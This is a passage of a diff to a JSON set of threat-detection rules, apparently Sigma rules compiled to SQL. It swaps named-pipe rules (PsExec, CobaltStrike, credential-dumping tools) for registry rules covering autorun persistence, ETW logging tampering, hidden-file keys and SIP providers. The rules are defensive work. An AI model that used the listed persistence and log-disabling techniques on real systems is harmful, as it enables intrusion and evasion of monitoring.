installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider 
Filters%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND NewValue LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND NewValue LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND NewValue IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR 
(TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND NewValue LIKE '%}\\\\python-%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND NewValue = 'ctfmon.exe /n') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (NewValue LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR NewValue LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND NewValue LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious 
Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName 
LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "ETW Logging Disabled For SCM", + "id": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "status": "experimental", + "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_services_etw_tamper.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "status": "test", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "PowerShell Execution Via Named Pipe", - "id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "status": "test", - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PSHost%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_powershell_execution_pipe.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - 
"status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "ETW Logging Disabled For rpcrt4.dll", + "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "status": "experimental", + "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_rpcrt4_etw_tamper.yml" }, { - "title": "EfsPotato Named Pipe", - "id": 
"637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": 
"CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' 
OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": 
